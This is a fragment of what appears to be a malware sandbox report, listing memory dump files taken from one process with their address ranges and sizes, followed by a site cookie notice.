    • memory/2788-102-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-104-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-108-0x0000000004F90000-0x00000000050B3000-memory.dmp

      Filesize

      1.1MB

    • memory/2788-109-0x0000000001FD0000-0x0000000001FD1000-memory.dmp

      Filesize

      4KB

    • memory/2788-110-0x0000000005310000-0x00000000054D5000-memory.dmp

      Filesize

      1.8MB

    • memory/2788-111-0x0000000005310000-0x00000000054D5000-memory.dmp

      Filesize

      1.8MB

    • memory/2788-112-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-34-0x00000000001E0000-0x00000000001E3000-memory.dmp

      Filesize

      12KB

    • memory/2788-120-0x0000000004F90000-0x00000000050B3000-memory.dmp

      Filesize

      1.1MB

    • memory/2788-26-0x0000000000060000-0x0000000000123000-memory.dmp

      Filesize

      780KB

    • memory/2788-31-0x00000000001E0000-0x00000000001E3000-memory.dmp

      Filesize

      12KB

    • memory/2788-131-0x0000000005310000-0x00000000054D5000-memory.dmp

      Filesize

      1.8MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.